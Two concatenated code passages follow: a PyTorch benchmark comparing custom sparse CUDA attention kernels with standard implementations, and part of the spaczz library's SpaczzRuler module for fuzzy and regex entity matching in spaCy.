dim = 1024
A = th.rand(n, dim, requires_grad=True, device='cuda:0')
B = th.rand(n, dim, requires_grad=True, device='cuda:0')
grad = th.rand(e, device='cuda:0')
tic = time.time()
A_e = th.sparse.mm(inc_x.float(), A)
B_e = th.sparse.mm(inc_y.float(), B)
y = (A_e * B_e).sum(-1)
y_ori = y.clone()
th.cuda.synchronize()
print('forward elapse time: {}'.format(time.time() - tic))
tic = time.time()
y.backward(grad)
th.cuda.synchronize()
print('backward elapse time: {}'.format(time.time() - tic))
A_grad_ori, B_grad_ori = A.grad.clone(), B.grad.clone()
A.grad.zero_()
B.grad.zero_()
print('simple implementation, hand-crafted autograd')
tic = time.time()
y = MaskedMMSimple.apply(inc_x, inc_y, A, B)
th.cuda.synchronize()
print('forward elapse time: {}'.format(time.time() - tic))
assert th.allclose(y, y_ori)
tic = time.time()
y.backward(grad)
th.cuda.synchronize()
print('backward elapse time: {}'.format(time.time() - tic))
assert th.allclose(A.grad, A_grad_ori) and th.allclose(B.grad, B_grad_ori)
A.grad.zero_()
B.grad.zero_()
print('vanilla bmm')
tic = time.time()
y = (A.view(batch_size, l, dim) @ B.view(batch_size, l, dim).transpose(-1, -2)).view(-1)
th.cuda.synchronize()
print('forward elapse time: {}'.format(time.time() - tic))
assert th.allclose(y, y_ori)
tic = time.time()
y.backward(grad)
th.cuda.synchronize()
print('backward elapse time: {}'.format(time.time() - tic))
assert th.allclose(A.grad, A_grad_ori) and th.allclose(B.grad, B_grad_ori)
A.grad.zero_()
B.grad.zero_()
print('custom kernel(csr)')
ROW, INDPTR_R = partition_csr(indptr_r, chunk_size=chunk_size)
COL, INDPTR_C = partition_csr(indptr_c, chunk_size=chunk_size)
tic = time.time()
y = MaskedMMCSR.apply(ROW, INDPTR_R, eid_r, indices_r, COL, INDPTR_C, eid_c, indices_c, A, B)
th.cuda.synchronize()
print('forward elapse time: {}'.format(time.time() - tic))
assert th.allclose(y, y_ori)
tic = time.time()
y.backward(grad)
th.cuda.synchronize()
print('backward elapse time: {}'.format(time.time() - tic))
assert th.allclose(A.grad, A_grad_ori) and th.allclose(B.grad, B_grad_ori)
# ------------------------------------------------------------------------
# Test sparse softmax
# ------------------------------------------------------------------------
print('------------------------------------')
print('vanilla softmax(scatter)')
tic = time.time()
x = th.rand(e, requires_grad=True, device='cuda:0')
y = th.softmax(x.view(batch_size, l, l), -1).view(-1)
th.cuda.synchronize()
print('forward elapse time: {}'.format(time.time() - tic))
tic = time.time()
y_ori = y.clone()
y.backward(grad)
th.cuda.synchronize()
print('backward elapse time: {}'.format(time.time() - tic))
x_grad_ori = x.grad.clone()
x.grad.zero_()
print('custom softmax(scatter)')
tic = time.time()
y = SparseSoftmax.apply(ROW, INDPTR_R, eid_r, x)
th.cuda.synchronize()
print('forward elapse time: {}'.format(time.time() - tic))
assert th.allclose(y_ori, y)
tic = time.time()
y.backward(grad)
th.cuda.synchronize()
print('backward elapse time: {}'.format(time.time() - tic))
assert th.allclose(x_grad_ori, x.grad, rtol=1e-3, atol=1e-6)
x.grad.zero_()
print('vanilla softmax(gather)')
tic = time.time()
x = th.rand(e, requires_grad=True, device='cuda:0')
y = th.softmax(x.view(batch_size, l, l), -2).view(-1)
th.cuda.synchronize()
print('forward elapse time: {}'.format(time.time() - tic))
tic = time.time()
y_ori = y.clone()
y.backward(grad)
th.cuda.synchronize()
print('backward elapse time: {}'.format(time.time() - tic))
x_grad_ori = x.grad.clone()
x.grad.zero_()
print('custom softmax(gather)')
tic = time.time()
y = SparseSoftmax.apply(COL, INDPTR_C, eid_c, x)
th.cuda.synchronize()
print('forward elapse time: {}'.format(time.time() - tic))
assert th.allclose(y_ori, y)
tic = time.time()
y.backward(grad)
th.cuda.synchronize()
print('backward elapse time: {}'.format(time.time() - tic))
assert th.allclose(x_grad_ori, x.grad, rtol=1e-3, atol=1e-6)
x.grad.zero_()
print('------------------------------------')
print("spmm(pytorch coalesce)")
A.grad.zero_()
grad = th.rand(n, dim, device='cuda:0')
tic = time.time()
y = th.sparse.mm(adj_1, A)
th.cuda.synchronize()
print('forward elapse time: {}'.format(time.time() - tic))
y_ori = y.clone()
tic = time.time()
y.backward(grad)
th.cuda.synchronize()
print('backward elapse time: {}'.format(time.time() - tic))
A_grad_ori = A.grad.clone()
adj_grad_ori = adj_1.grad._values()
A.grad.zero_()
adj_1.grad.zero_()
print("vector-spmm(custom)")
tic = time.time()
val = adj_1._values()
val.requires_grad_(True)
y = VectorSPMM.apply(ROW, INDPTR_R, eid_r, indices_r, COL, INDPTR_C, eid_c, indices_c, val, A)
th.cuda.synchronize()
print('forward elapse time: {}'.format(time.time() - tic))
assert th.allclose(y_ori, y)
tic = time.time()
y.backward(grad)
th.cuda.synchronize()
print('backward elapse time: {}'.format(time.time() - tic))
assert th.allclose(A_grad_ori, A.grad) and th.allclose(val.grad, adj_grad_ori)
A.grad.zero_()
val.grad.zero_()
"""
Multi Head Test
"""
print('\nMulti Head (batch size: 512, length: 30, head: 8, dim:64)\n===========================================')
print('NodeMulEdge\nsimple implementation(copy to edge)')
dim = 64
h = 8
A = th.rand(n, dim * h, requires_grad=True, device='cuda:0')
B = th.rand(e, dim, requires_grad=True, device='cuda:0')
grad = th.rand(e, h, device='cuda:0')
tic = time.time()
A_e = th.sparse.mm(inc_x.float(), A)
y = (A_e.view(-1, h, dim) * B.view(-1, 1, dim)).sum(-1)
y_ori = y.clone()
th.cuda.synchronize()
print('forward elapse time: {}'.format(time.time() - tic))
tic = time.time()
y.backward(grad)
th.cuda.synchronize()
print('backward elapse time: {}'.format(time.time() - tic))
A_grad_ori, B_grad_ori = A.grad.clone(), B.grad.clone()
A.grad.zero_()
B.grad.zero_()
print('custom kernel')
tic = time.time()
y = NodeMulEdge.apply(ROW, INDPTR_R, eid_r, A.view(-1, h, dim), B.view(-1, dim))
th.cuda.synchronize()
print('forward elapse time: {}'.format(time.time() - tic))
assert th.allclose(y_ori, y)
tic = time.time()
y.backward(grad)
th.cuda.synchronize()
print('backward elapse time: {}'.format(time.time() - tic))
assert th.allclose(A_grad_ori, A.grad) and th.allclose(B_grad_ori, B.grad)
A.grad.zero_()
B.grad.zero_()
print('MaskedNN(src_dot_dst)\nsimple implementation(copy to edge)')
dim = 64
h = 8
A = th.rand(n, dim * h, requires_grad=True, device='cuda:0')
B = th.rand(n, dim * h, requires_grad=True, device='cuda:0')
grad = th.rand(e, h, device='cuda:0')
tic = time.time()
A_e = th.sparse.mm(inc_x.float(), A)
B_e = th.sparse.mm(inc_y.float(), B)
y = (A_e.view(-1, h, dim) * B_e.view(-1, h, dim)).sum(-1)
y_ori = y.clone()
th.cuda.synchronize()
print('forward elapse time: {}'.format(time.time() - tic))
tic = time.time()
y.backward(grad)
th.cuda.synchronize()
print('backward elapse time: {}'.format(time.time() - tic))
A_grad_ori, B_grad_ori = A.grad.clone(), B.grad.clone()
A.grad.zero_()
B.grad.zero_()
print('vanilla bmm')
tic = time.time()
y = (A.view(batch_size, l, h, dim).contiguous().transpose(1, 2) @ B.view(batch_size, l, h, dim).contiguous().permute(0, 2, 3, 1)).permute(0, 2, 3, 1).contiguous().view(-1, h)
th.cuda.synchronize()
print('forward elapse time: {}'.format(time.time() - tic))
assert th.allclose(y, y_ori)
tic = time.time()
y.backward(grad)
th.cuda.synchronize()
print('backward elapse time: {}'.format(time.time() - tic))
assert th.allclose(A.grad, A_grad_ori) and th.allclose(B.grad, B_grad_ori)
A.grad.zero_()
B.grad.zero_()
print('custom kernel(csr)')
tic = time.time()
y = MaskedMMCSR.apply(ROW, INDPTR_R, eid_r, indices_r, COL, INDPTR_C, eid_c, indices_c, A.view(-1, h, dim), B.view(-1, h, dim))
th.cuda.synchronize()
print('forward elapse time: {}'.format(time.time() - tic))
assert th.allclose(y, y_ori)
tic = time.time()
y.backward(grad)
th.cuda.synchronize()
print('backward elapse time: {}'.format(time.time() - tic))
assert th.allclose(A.grad, A_grad_ori) and th.allclose(B.grad, B_grad_ori)
# ------------------------------------------------------------------------
# Test sparse softmax
# ------------------------------------------------------------------------
print('------------------------------------')
print('vanilla softmax(scatter)')
tic = time.time()
x = th.rand(e, h, requires_grad=True, device='cuda:0')
y = th.softmax(x.view(batch_size, l, l, h), -2).view(-1, h)
th.cuda.synchronize()
print('forward elapse time: {}'.format(time.time() - tic))
tic = time.time()
y_ori = y.clone()
y.backward(grad)
th.cuda.synchronize()
print('backward elapse time: {}'.format(time.time() - tic))
x_grad_ori = x.grad.clone()
x.grad.zero_()
print('custom softmax(scatter)')
tic = time.time()
y = SparseSoftmax.apply(ROW, INDPTR_R, eid_r, x)
th.cuda.synchronize()
print('forward elapse time: {}'.format(time.time() - tic))
assert th.allclose(y_ori, y)
tic = time.time()
y.backward(grad)
th.cuda.synchronize()
print('backward elapse time: {}'.format(time.time() - tic))
assert th.allclose(x_grad_ori, x.grad, rtol=1e-3, atol=1e-6)
x.grad.zero_()
print('vanilla softmax(gather)')
tic = time.time()
x = th.rand(e, h, requires_grad=True, device='cuda:0')
y = th.softmax(x.view(batch_size, l, l, h), -3).view(-1, h)
th.cuda.synchronize()
print('forward elapse time: {}'.format(time.time() - tic))
tic = time.time()
y_ori = y.clone()
y.backward(grad)
th.cuda.synchronize()
print('backward elapse time: {}'.format(time.time() - tic))
x_grad_ori = x.grad.clone()
x.grad.zero_()
print('custom softmax(gather)')
tic = time.time()
y = SparseSoftmax.apply(COL, INDPTR_C, eid_c, x)
th.cuda.synchronize()
print('forward elapse time: {}'.format(time.time() - tic))
assert th.allclose(y_ori, y)
tic = time.time()
y.backward(grad)
th.cuda.synchronize()
print('backward elapse time: {}'.format(time.time() - tic))
assert th.allclose(x_grad_ori, x.grad, rtol=1e-3, atol=1e-6)
x.grad.zero_()
adjs = []
for index in range(8):
adj_index = th.sparse.FloatTensor(i, th.rand(e), th.Size([n, n])).cuda(0).coalesce()
adj_index.requires_grad_(True)
adjs.append(adj_index)
print('------------------------------------')
print("spmm(pytorch coalesce)")
A.grad.zero_()
grad = [th.rand(n, dim, device='cuda:0') for _ in range(8)]
tic = time.time()
ys = []
for index in range(8):
ys.append(th.sparse.mm(adjs[index], A.view(n, h, dim)[:, index, :]))
th.cuda.synchronize()
print('forward elapse time: {}'.format(time.time() - tic))
y_ori = th.cat([y.clone().view(n, 1, dim) for y in ys], dim=-2)
tic = time.time()
for index in range(8):
ys[index].backward(grad[index])
th.cuda.synchronize()
print('backward elapse time: {}'.format(time.time() - tic))
A_grad_ori = A.grad.clone()
adj_grad_ori = th.cat([_.grad._values().view(e, 1) for _ in adjs], dim=-1)
A.grad.zero_()
for index in range(8):
adjs[index].grad.zero_()
print("vector-spmm(custom)")
val = th.cat([_._values().view(-1, 1) for _ in adjs], dim=-1)
val.requires_grad_(True)
tic = time.time()
y = VectorSPMM.apply(ROW, INDPTR_R, eid_r, indices_r, COL, INDPTR_C, eid_c, indices_c, val, A.view(n, h, dim))
th.cuda.synchronize()
print('forward elapse time: {}'.format(time.time() - tic))
assert th.allclose(y_ori, y)
tic = time.time()
y.backward(th.cat([_.view(n, 1, dim) for _ in grad], dim=-2))
th.cuda.synchronize()
print('backward elapse time: {}'.format(time.time() - tic))
|
src/spaczz/pipeline/_spaczzruler.py | JonasHablitzel/spaczz | 153 | 12652918 | """Module for spaCy v3 compatible SpaczzRuler."""
from __future__ import annotations
from collections import defaultdict
from itertools import chain
from logging import exception
from pathlib import Path
from typing import (
Any,
Callable,
DefaultDict,
Dict,
Iterable,
List,
Optional,
Set,
Tuple,
Union,
)
import warnings
try:
from spacy.language import Language
from spacy.pipeline import Pipe
from spacy.scorer import get_ner_prf
from spacy.tokens import Doc, Span
from spacy.training import Example, validate_examples
from spacy.util import SimpleFrozenDict, SimpleFrozenList
except ImportError: # pragma: no cover
raise ImportError(
(
"Trying to import spaCy v3 compatible SpaczzRuler from spaCy v2.",
"Please upgrade or use the SpaczzRuler in _spaczzruler-legacy",
)
)
import srsly
from ..exceptions import PatternTypeWarning
from ..matcher import FuzzyMatcher, RegexMatcher, TokenMatcher
from ..regex import RegexConfig
from ..util import ensure_path, nest_defaultdict, read_from_disk, write_to_disk
DEFAULT_ENT_ID_SEP = "||"
simple_frozen_dict = SimpleFrozenDict()
simple_frozen_list = SimpleFrozenList()
@Language.factory(
"spaczz_ruler",
assigns=["doc.ents", "token.ent_type", "token.ent_iob"],
default_config={
"overwrite_ents": False,
"ent_id_sep": DEFAULT_ENT_ID_SEP,
"fuzzy_defaults": simple_frozen_dict,
"regex_defaults": simple_frozen_dict,
"token_defaults": simple_frozen_dict,
},
default_score_weights={
"ents_f": 1.0,
"ents_p": 0.0,
"ents_r": 0.0,
"ents_per_type": None,
},
)
def make_spaczz_ruler(
# typing nlp with Language causes issue with Pydantic in spaCy integration
nlp: Any,
name: str,
overwrite_ents: bool,
ent_id_sep: str,
fuzzy_defaults: Dict[str, Any],
regex_defaults: Dict[str, Any],
token_defaults: Dict[str, Any],
) -> SpaczzRuler:
"""Factory method for creating a `SpaczzRuler`."""
return SpaczzRuler(
nlp,
name,
overwrite_ents=overwrite_ents,
ent_id_sep=ent_id_sep,
fuzzy_defaults=fuzzy_defaults,
regex_defaults=regex_defaults,
token_defaults=token_defaults,
)
class SpaczzRuler(Pipe):
"""The `SpaczzRuler` adds fuzzy and multi-token regex matches to spaCy `Doc.ents`.
It can be combined with other spaCy NER components like the statistical
`EntityRecognizer` and/or the `EntityRuler` to boost accuracy.
After initialization, the component is typically added to the pipeline
using `nlp.add_pipe`.
Attributes:
nlp: The shared nlp object to pass the vocab to the matchers
(not currently used by spaczz matchers) and process fuzzy patterns.
fuzzy_patterns:
Patterns added to the fuzzy matcher.
regex_patterns:
Patterns added to the regex matcher.
token_patterns:
Patterns added to the token matcher
fuzzy_matcher: The `FuzzyMatcher` instance
the spaczz ruler will use for fuzzy phrase matching.
regex_matcher: The `RegexMatcher` instance
the spaczz ruler will use for regex phrase matching.
token_matcher: The `TokenMatcher` instance
the spaczz ruler will use for token matching.
defaults: Default matching settings for their respective matchers.
"""
name = "spaczz_ruler"
def __init__(
self: SpaczzRuler,
nlp: Language,
name: str = "spaczz_ruler",
*,
overwrite_ents: bool = False,
ent_id_sep: str = DEFAULT_ENT_ID_SEP,
fuzzy_defaults: Dict[str, Any] = simple_frozen_dict,
regex_defaults: Dict[str, Any] = simple_frozen_dict,
token_defaults: Dict[str, Any] = simple_frozen_dict,
regex_config: Union[str, RegexConfig] = "default",
patterns: Optional[Iterable[Dict[str, Any]]] = None,
**kwargs: Any,
) -> None:
"""Initialize the spaczz ruler.
If `patterns` is supplied here, it needs to be an iterable of spaczz patterns:
dictionaries with `"label"`, `"pattern"`, and `"type"` keys.
If the patterns are fuzzy or regex phrase patterns
they can include the optional `"kwargs"` keys.
For example, a fuzzy phrase pattern:
`{'label': 'ORG', 'pattern': 'Apple',
'type': 'fuzzy', 'kwargs': {'min_r2': 90}}`
Or, a token pattern:
`{'label': 'ORG', 'pattern': [{'TEXT': {'FUZZY': 'Apple'}}], 'type': 'token'}`
Prior to spaczz v0.5, optional parameters had to be prepended with "spaczz_"
to prevent potential conflicts with other spaCy components.
As of spaCy v3 this is no longer an issue so prepending optional parameters
with "spaczz_" is no longer necessary.
Args:
nlp: The shared `Language` object to pass the vocab to the matchers
and process fuzzy patterns.
name: Instance name of the current pipeline component. Typically
passed in automatically from the factory when the component is
added. Used to disable the current entity ruler while creating
phrase patterns with the nlp object.
overwrite_ents: If existing entities are present, e.g. entities
added by the model, overwrite them by matches if necessary.
Default is `False`.
ent_id_sep: Separator used internally for entity IDs.
fuzzy_defaults: Modified default parameters to use with the `FuzzyMatcher`.
Default is `None`.
regex_defaults: Modified default parameters to use with the `RegexMatcher`.
Default is `None`.
token_defaults: Modified default parameters to use with the `TokenMatcher`.
Default is `None`.
regex_config: Should largely be ignored as an artifact of an old spaczz
design pattern. Will likely be updated in the future.
Default is `"default"`.
patterns: Optional patterns to load in. Default is `None`.
kwargs: For backwards compatibility with "spaczz_" prepended parameters.
Raises:
TypeError: If matcher defaults passed are not dictionaries.
"""
self.nlp = nlp
self.name = name
self.overwrite = kwargs.get("spaczz_overwrite_ents", overwrite_ents)
self.fuzzy_patterns: DefaultDict[str, DefaultDict[str, Any]] = nest_defaultdict(
list, 2
)
self.regex_patterns: DefaultDict[str, DefaultDict[str, Any]] = nest_defaultdict(
list, 2
)
self.token_patterns: DefaultDict[str, List[List[Dict[str, Any]]]] = defaultdict(
list
)
self.ent_id_sep = kwargs.get("spaczz_ent_id_sep", ent_id_sep)
self._ent_ids: DefaultDict[Any, Any] = defaultdict(dict)
self.defaults = {}
default_names = (
"fuzzy_defaults",
"regex_defaults",
"token_defaults",
)
fuzzy_defaults = kwargs.get("spaczz_fuzzy_defaults", fuzzy_defaults)
regex_defaults = kwargs.get("spaczz_regex_defaults", regex_defaults)
token_defaults = kwargs.get("spaczz_token_defaults", token_defaults)
for default, name in zip(
(fuzzy_defaults, regex_defaults, token_defaults), default_names
):
if isinstance(default, dict):
self.defaults[name] = default
else:
raise TypeError(
(
"Defaults must be a dictionary of keyword arguments,",
f"not {type(default)}.",
)
)
self.fuzzy_matcher = FuzzyMatcher(nlp.vocab, **self.defaults["fuzzy_defaults"])
self.regex_matcher = RegexMatcher(
nlp.vocab, regex_config, **self.defaults["regex_defaults"]
)
self.token_matcher = TokenMatcher(nlp.vocab, **self.defaults["token_defaults"])
patterns = kwargs.get("spaczz_patterns", patterns)
if patterns is not None:
self.add_patterns(patterns)
def __call__(self: SpaczzRuler, doc: Doc) -> Doc:
"""Find matches in document and add them as entities.
Args:
doc: The Doc object in the pipeline.
Returns:
The Doc with added entities, if available.
Example:
>>> import spacy
>>> from spaczz.pipeline import SpaczzRuler
>>> nlp = spacy.blank("en")
>>> ruler = SpaczzRuler(nlp)
>>> doc = nlp.make_doc("My name is <NAME>")
>>> ruler.add_patterns([{"label": "NAME", "pattern": "<NAME>",
"type": "fuzzy", "kwargs": {"fuzzy_func": "token_sort"}}])
>>> doc = ruler(doc)
>>> "<NAME>" in [ent.text for ent in doc.ents]
True
"""
error_handler = self.get_error_handler()
try:
matches, lookup = self.match(doc)
self.set_annotations(doc, matches, lookup)
return doc
except exception as e: # type: ignore
error_handler(self.name, self, [doc], e)
def __contains__(self: SpaczzRuler, label: str) -> bool:
"""Whether a label is present in the patterns."""
return (
label in self.fuzzy_patterns
or label in self.regex_patterns
or label in self.token_patterns
)
def __len__(self: SpaczzRuler) -> int:
"""The number of all patterns added to the ruler."""
n_fuzzy_patterns = sum(len(p["patterns"]) for p in self.fuzzy_patterns.values())
n_regex_patterns = sum(len(p["patterns"]) for p in self.regex_patterns.values())
n_token_patterns = sum(len(p) for p in self.token_patterns.values())
return n_fuzzy_patterns + n_regex_patterns + n_token_patterns
@property
def ent_ids(self: SpaczzRuler) -> Tuple[Optional[str], ...]:
"""All entity ids present in the match patterns id properties.
Returns:
The unique string entity ids as a tuple.
Example:
>>> import spacy
>>> from spaczz.pipeline import SpaczzRuler
>>> nlp = spacy.blank("en")
>>> ruler = SpaczzRuler(nlp)
>>> ruler.add_patterns([{"label": "AUTHOR", "pattern": "Kerouac",
"type": "fuzzy", "id": "BEAT"}])
>>> ruler.ent_ids
('BEAT',)
"""
keys = set(self.fuzzy_patterns.keys())
keys.update(self.regex_patterns.keys())
keys.update(self.token_patterns.keys())
all_ent_ids = set()
for k in keys:
if self.ent_id_sep in k:
_, ent_id = self._split_label(k)
all_ent_ids.add(ent_id)
all_ent_ids_tuple = tuple(all_ent_ids)
return all_ent_ids_tuple
@property
def labels(self: SpaczzRuler) -> Tuple[str, ...]:
"""All labels present in the ruler.
Returns:
The unique string labels as a tuple.
Example:
>>> import spacy
>>> from spaczz.pipeline import SpaczzRuler
>>> nlp = spacy.blank("en")
>>> ruler = SpaczzRuler(nlp)
>>> ruler.add_patterns([{"label": "AUTHOR", "pattern": "Kerouac",
"type": "fuzzy"}])
>>> ruler.labels
('AUTHOR',)
"""
keys = set(self.fuzzy_patterns.keys())
keys.update(self.regex_patterns.keys())
keys.update(self.token_patterns.keys())
all_labels = set()
for k in keys:
if self.ent_id_sep in k:
label, _ = self._split_label(k)
all_labels.add(label)
else:
all_labels.add(k)
return tuple(all_labels)
@property
def patterns(self: SpaczzRuler) -> List[Dict[str, Any]]:
"""Get all patterns and kwargs that were added to the ruler.
Returns:
The original patterns and kwargs, one dictionary for each combination.
Example:
>>> import spacy
>>> from spaczz.pipeline import SpaczzRuler
>>> nlp = spacy.blank("en")
>>> ruler = SpaczzRuler(nlp)
>>> ruler.add_patterns([{"label": "STREET", "pattern": "street_addresses",
"type": "regex", "kwargs": {"predef": True}}])
>>> ruler.patterns == [
{
"label": "STREET",
"pattern": "street_addresses",
"type": "regex",
"kwargs": {"predef": True},
},
]
True
"""
all_patterns = []
for label, fuzzy_patterns in self.fuzzy_patterns.items():
for fuzzy_pattern, fuzzy_kwargs in zip(
fuzzy_patterns["patterns"], fuzzy_patterns["kwargs"]
):
ent_label, ent_id = self._split_label(label)
p = {"label": ent_label, "pattern": fuzzy_pattern.text, "type": "fuzzy"}
if fuzzy_kwargs:
p["kwargs"] = fuzzy_kwargs
if ent_id:
p["id"] = ent_id
all_patterns.append(p)
for label, regex_patterns in self.regex_patterns.items():
for regex_pattern, regex_kwargs in zip(
regex_patterns["patterns"], regex_patterns["kwargs"]
):
ent_label, ent_id = self._split_label(label)
p = {"label": ent_label, "pattern": regex_pattern, "type": "regex"}
if regex_kwargs:
p["kwargs"] = regex_kwargs
if ent_id:
p["id"] = ent_id
all_patterns.append(p)
for label, token_patterns in self.token_patterns.items():
for token_pattern in token_patterns:
ent_label, ent_id = self._split_label(label)
p = {"label": ent_label, "pattern": token_pattern, "type": "token"}
if ent_id:
p["id"] = ent_id
all_patterns.append(p)
return all_patterns
def add_patterns(
self: SpaczzRuler,
patterns: Iterable[Dict[str, Any]],
) -> None:
"""Add patterns to the ruler.
A pattern must be a spaczz pattern:
`{label (str), pattern (str or list), type (str),
optional kwargs (dict[str, Any]), and optional id (str)}`.
For example, a fuzzy phrase pattern:
`{'label': 'ORG', 'pattern': 'Apple',
'type': 'fuzzy', 'kwargs': {'min_r2': 90}}`
Or, a token pattern:
`{'label': 'ORG', 'pattern': [{'TEXT': {'FUZZY': 'Apple'}}], 'type': 'token'}`
To utilize regex flags, use inline flags.
Kwarg details to be updated.
Args:
patterns: The spaczz patterns to add.
Raises:
TypeError: If patterns is not an iterable of dictionaries.
ValueError: If one or more patterns do not conform
the spaczz pattern structure.
Example:
>>> import spacy
>>> from spaczz.pipeline import SpaczzRuler
>>> nlp = spacy.blank("en")
>>> ruler = SpaczzRuler(nlp)
>>> ruler.add_patterns([{"label": "AUTHOR", "pattern": "Kerouac",
"type": "fuzzy"}])
>>> "AUTHOR" in ruler.labels
True
"""
# disable the nlp components after this one in case
# they hadn't been initialized / deserialised yet
try:
current_index = -1
for i, (_name, pipe) in enumerate(self.nlp.pipeline):
if self == pipe:
current_index = i
break
subsequent_pipes = [
pipe for pipe in self.nlp.pipe_names[current_index + 1 :]
]
except ValueError:
subsequent_pipes = []
with self.nlp.select_pipes(disable=subsequent_pipes):
token_patterns = []
fuzzy_pattern_labels = []
fuzzy_pattern_texts = []
fuzzy_pattern_kwargs = []
fuzzy_pattern_ids = []
regex_pattern_labels = []
regex_pattern_texts = []
regex_pattern_kwargs = []
regex_pattern_ids = []
for entry in patterns:
try:
if isinstance(entry, dict):
if entry["type"] == "fuzzy":
fuzzy_pattern_labels.append(entry["label"])
fuzzy_pattern_texts.append(entry["pattern"])
fuzzy_pattern_kwargs.append(entry.get("kwargs", {}))
fuzzy_pattern_ids.append(entry.get("id"))
elif entry["type"] == "regex":
regex_pattern_labels.append(entry["label"])
regex_pattern_texts.append(entry["pattern"])
regex_pattern_kwargs.append(entry.get("kwargs", {}))
regex_pattern_ids.append(entry.get("id"))
elif entry["type"] == "token":
token_patterns.append(entry)
else:
warnings.warn(
f"""Spaczz pattern "type" must be "fuzzy", "regex",
or "token", not {entry["type"]}. Skipping this pattern.
""",
PatternTypeWarning,
)
else:
raise TypeError(
("Patterns must either be an iterable of dicts.")
)
except KeyError:
raise ValueError(
(
"One or more patterns do not conform",
"to spaczz pattern structure: ",
"{label (str), pattern (str or list), type (str),",
"optional kwargs (dict[str, Any]),",
"and optional id (str)}.",
)
)
fuzzy_patterns = []
for label, pattern, kwargs, ent_id in zip(
fuzzy_pattern_labels,
self.nlp.pipe(fuzzy_pattern_texts),
fuzzy_pattern_kwargs,
fuzzy_pattern_ids,
):
fuzzy_pattern = {
"label": label,
"pattern": pattern,
"kwargs": kwargs,
"type": "fuzzy",
}
if ent_id:
fuzzy_pattern["id"] = ent_id
fuzzy_patterns.append(fuzzy_pattern)
regex_patterns = []
for label, pattern, kwargs, ent_id in zip(
regex_pattern_labels,
regex_pattern_texts,
regex_pattern_kwargs,
regex_pattern_ids,
):
regex_pattern = {
"label": label,
"pattern": pattern,
"kwargs": kwargs,
"type": "regex",
}
if ent_id:
regex_pattern["id"] = ent_id
regex_patterns.append(regex_pattern)
self._add_patterns(fuzzy_patterns, regex_patterns, token_patterns)
def clear(self: SpaczzRuler) -> None:
"""Reset all patterns."""
self.fuzzy_patterns = nest_defaultdict(list, 2)
self.regex_patterns = nest_defaultdict(list, 2)
self.token_patterns = defaultdict(list)
self._ent_ids = defaultdict(dict)
def initialize(
self: SpaczzRuler,
get_examples: Callable[[], Iterable[Example]],
*,
nlp: Optional[Language] = None,
patterns: Optional[Iterable[Dict[str, Any]]] = None,
) -> None:
"""Initialize the pipe for training.
Args:
get_examples: Function that returns a representative sample
of gold-standard Example objects.
nlp: The current nlp object the component is part of.
patterns: The list of patterns.
"""
self.clear()
if patterns:
self.add_patterns(patterns)
def match(
self: SpaczzRuler, doc: Doc
) -> Tuple[
List[Tuple[str, int, int]],
DefaultDict[str, Dict[Tuple[str, int, int], Any]],
]:
"""Used in call to find matches in a doc."""
fuzzy_matches = []
lookup: DefaultDict[str, Dict[Tuple[str, int, int], Any]] = defaultdict(dict)
for fuzzy_match in self.fuzzy_matcher(doc):
current_ratio = fuzzy_match[3]
best_ratio = lookup["ratios"].get(fuzzy_match[:3], 0)
if current_ratio > best_ratio:
fuzzy_matches.append(fuzzy_match[:3])
lookup["ratios"][fuzzy_match[:3]] = current_ratio
regex_matches = []
for regex_match in self.regex_matcher(doc):
current_counts = regex_match[3]
best_counts = lookup["counts"].get(regex_match[:3])
if not best_counts or sum(current_counts) < sum(best_counts):
regex_matches.append(regex_match[:3])
lookup["counts"][regex_match[:3]] = current_counts
token_matches = []
for token_match in self.token_matcher(doc):
token_matches.append(token_match[:3])
lookup["details"][token_match[:3]] = 1
matches = fuzzy_matches + regex_matches + token_matches
unique_matches, lookup = self._filter_overlapping_matches(matches, lookup)
return unique_matches, lookup
def score(self: SpaczzRuler, examples: Any, **kwargs: Any) -> Any:
"""Pipeline scoring for spaCy compatibility."""
validate_examples(examples, "SpaczzRuler.score")
return get_ner_prf(examples)
def set_annotations(
self: SpaczzRuler,
doc: Doc,
matches: List[Tuple[str, int, int]],
lookup: DefaultDict[
str, Dict[Tuple[str, int, int], Union[int, Tuple[int, int, int]]]
],
) -> None:
"""Modify the document in place."""
entities = list(doc.ents)
new_entities = []
seen_tokens: Set[int] = set()
for match_id, start, end in matches:
if any(t.ent_type for t in doc[start:end]) and not self.overwrite:
continue
# check for end - 1 here because boundaries are inclusive
if start not in seen_tokens and end - 1 not in seen_tokens:
if match_id in self._ent_ids:
label, ent_id = self._ent_ids[match_id]
span = Span(doc, start, end, label=label)
if ent_id:
for token in span:
token.ent_id_ = ent_id
else:
span = Span(doc, start, end, label=match_id)
span = self._update_custom_attrs(span, match_id, lookup)
new_entities.append(span)
entities = [
e for e in entities if not (e.start < end and e.end > start)
]
seen_tokens.update(range(start, end))
doc.ents = entities + new_entities
def from_bytes(
self: SpaczzRuler,
patterns_bytes: bytes,
*,
exclude: Iterable[str] = simple_frozen_list,
) -> SpaczzRuler:
"""Load the spaczz ruler from a bytestring.
Args:
patterns_bytes : The bytestring to load.
exclude: For spaCy consistency.
Returns:
The loaded spaczz ruler.
Example:
>>> import spacy
>>> from spaczz.pipeline import SpaczzRuler
>>> nlp = spacy.blank("en")
>>> ruler = SpaczzRuler(nlp)
>>> ruler.add_patterns([{"label": "AUTHOR", "pattern": "Kerouac",
"type": "fuzzy"}])
>>> ruler_bytes = ruler.to_bytes()
>>> new_ruler = SpaczzRuler(nlp)
>>> new_ruler = new_ruler.from_bytes(ruler_bytes)
>>> "AUTHOR" in new_ruler
True
"""
cfg = srsly.msgpack_loads(patterns_bytes)
self.clear()
if isinstance(cfg, dict):
self.add_patterns(cfg.get("patterns", cfg))
self.defaults = cfg.get("defaults", {})
if self.defaults.get("fuzzy_defaults"):
self.fuzzy_matcher = FuzzyMatcher(
self.nlp.vocab, **self.defaults["fuzzy_defaults"]
)
if self.defaults.get("regex_defaults"):
self.regex_matcher = RegexMatcher(
self.nlp.vocab, **self.defaults["regex_defaults"]
)
if self.defaults.get("token_defaults"):
self.token_matcher = TokenMatcher(
self.nlp.vocab, **self.defaults["token_defaults"]
)
self.overwrite = cfg.get("overwrite", False)
self.ent_id_sep = cfg.get("ent_id_sep", DEFAULT_ENT_ID_SEP)
else:
self.add_patterns(cfg)
return self
def to_bytes(
self: SpaczzRuler, *, exclude: Iterable[str] = simple_frozen_list
) -> bytes:
"""Serialize the spaczz ruler patterns to a bytestring.
Args:
exclude: For spaCy consistency.
Returns:
The serialized patterns.
Example:
>>> import spacy
>>> from spaczz.pipeline import SpaczzRuler
>>> nlp = spacy.blank("en")
>>> ruler = SpaczzRuler(nlp)
